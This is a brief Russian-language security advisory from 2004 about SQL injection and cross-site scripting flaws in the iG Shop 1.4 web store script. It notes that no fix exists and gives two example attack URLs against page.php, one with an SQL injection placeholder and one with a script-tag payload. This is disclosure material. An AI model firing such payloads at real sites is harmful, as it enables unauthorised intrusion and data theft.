Security Lab

Несколько уязвимостей в iG Shop

Дата публикации:02.03.2004
Всего просмотров:1530
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: iG Shop 1.4

Описание: Уязвимость обнаружена в iG Shop. Удаленный атакующий может выполнить XSS нападение и нападение SQL инъекции.

1. SQL инъекция:

 page.php?page_type=catalog_products&type_id[]='[SQL Injection]&SESSION_ID={SESSION_ID}&SESSION_ID=
2. XSS нападение:
page.php?page_type=catalog_products&typ e_id[]=%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

URL производителя: http://www.igeneric.co.uk/PHP/iG_Scripts/11.html

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Vulnerability